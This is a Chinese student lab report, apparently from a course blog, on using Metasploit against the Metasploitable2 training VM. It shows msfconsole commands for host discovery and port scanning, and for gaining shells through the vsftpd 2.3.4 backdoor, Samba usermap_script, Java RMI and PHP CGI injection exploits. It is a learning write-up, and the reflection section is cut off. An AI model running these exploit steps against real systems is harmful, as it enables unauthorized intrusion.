一、实验内容
学习掌握Metasploit工具的使用。
下载靶机Metasploitable2,完成以下实验内容。
1.前期渗透
(1)主机发现(可用Aux中的arp_sweep,search一下就可以use)
(2)端口扫描(可以直接用nmap,也可以用Aux中的portscan/tcp等)
(3)扫描系统版本,漏洞等
2.Vsftpd源码包后门漏洞(21端口)
3.SambaMS-RPC Shell命令注入漏洞(端口139)
4.Java RMI SERVER命令执行漏洞(1099端口)
5.PHP CGI参数执行注入漏洞(80端口)
二、实验过程
1.前期渗透
(1)主机发现
靶机ifconfig
,查看靶机的ip地址,为192.168.196.129
攻击机ping靶机,能ping通
打开msfconsole控制台,search arp_sweep
选择漏洞
use 0
set rhost 192.168.196.129
run
扫描靶机,成功找到
(2)端口扫描
打开msfconsole控制台,search portscan/tcp
选择漏洞
use 0
set rhost 192.168.196.129
set ports 1-2000
run
(因为tcp扫描速度比较慢,这里只选择扫描1-2000端口,有兴趣的可以扫描1-65535端口)开放的端口如图
(3)扫描目标HTTP服务器的HTTP版本信息
打开msfconsole控制台,use auxiliary/scanner/http/http_version
选择漏洞
set rhost 192.168.196.129
run
成功扫描出了HTTP版本信息
2.Vsftpd源码包后门漏洞(21端口)
在之前的端口扫描中,我们知道了21端口是可以被利用的
打开msfconsole控制台,use exploit/unix/ftp/vsftpd_234_backdoor
选择漏洞
set rhost 192.168.196.129
run
成功得到了靶机的shell,输入uname -a
,pwd
,id
,ifconfig
验证
3.SambaMS-RPC Shell命令注入漏洞(端口139)
在之前的端口扫描中,我们知道了139端口是可以被利用的
打开msfconsole控制台,use exploit/multi/samba/usermap_script
选择漏洞
set rhost 192.168.196.129
exploit
成功得到了靶机的shell,输入uname -a
,ifconfig
验证
4.Java RMI SERVER命令执行漏洞(1099端口)
在之前的端口扫描中,我们知道了1099端口是可以被利用的
打开msfconsole控制台,use exploit/multi/misc/java_rmi_server
选择漏洞
set rhost 192.168.196.129
run
进程建立成功,接着输入sessions -i 1
,shell
,ls
验证得到了shell
也可以输入whoami
进行验证
5.PHP CGI参数执行注入漏洞(80端口)
在之前的端口扫描中,我们知道了80端口是可以被利用的
打开msfconsole控制台,use exploit/multi/http/php_cgi_arg_injection
选择漏洞
set rhost 192.168.196.129
run
获得了靶机的shell,输入shell
,ls
查看文件
三、问题及解决方案
问题1:virtualbox上安装的kali无法与给定的靶机进行有效互动,有些漏洞利用不了
问题1解决方案:在vmware上重建一个kali虚拟机,并且kali和ubuntu的网络连接方式都设置为NAT模式
四、学习感悟、思考等
经过课上作业和
标签:use,set,漏洞,端口,192.168,2024,2025,靶机,20222310 From: https://www.cnblogs.com/abe1fan/p/18549377